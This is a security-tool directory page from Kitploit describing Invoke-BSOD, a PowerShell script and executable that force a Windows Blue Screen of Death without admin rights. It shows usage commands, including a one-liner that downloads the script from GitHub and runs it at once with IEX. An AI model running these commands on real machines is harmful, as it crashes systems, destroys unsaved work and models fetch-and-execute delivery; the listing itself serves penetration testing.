Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Invoke-BSOD — For when you want a computer to be done - without admin! | Kitploit
Tools/GitHubGitHub/peewpw/invoke-bsod
Privilege EscalationExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubpeewpw/invoke-bsod

Invoke-BSOD

For when you want a computer to be done - without admin!

View Repository
314728 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Invoke-BSOD

For when you want a computer to be done - without admin!

BSOD method from here: https://github.com/Leurak/MEMZ/blob/master/WindowsTrojan/Source/Destructive/KillWindows.c#L10-L18

Invoke-BSOD.ps1

A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumeartes Windows crash dump settings.

This is a standalone script, it does not depend on any other files here.

Invoke-BSOD

Invokes the Blue Screen of Death.

Get-DumpSettings

Returns the current crash dump settings so you'll know what type of dump you are going to generate, and where it is going to be.

More information on the types of dump files here: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/varieties-of-kernel-mode-dump-files

Usage:

root@kitploit:~
PS>Import-Module .\Invoke-BSOD.ps1
PS>Get-DumpSettings

  Name                           Value
  ----                           -----
  DumpFileLocation               C:\WINDOWS\MEMORY.DMP
  OverwritePrevious              True
  AutoReboot                     True
  AutoDeleteWhenLowSpace         False
  SystemLogEvent                 True
  CrashDumpMode                  Automatic Memory Dump
  
PS>Invoke-BSOD

OR...

root@kitploit:~
PS>IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD

BSOD.exe

A compiled executable that also creates a Blue Screen of Death.

Useful when you don't have PowerShell?

Program.cs

The C# source behind BSOD.exe

Download Tool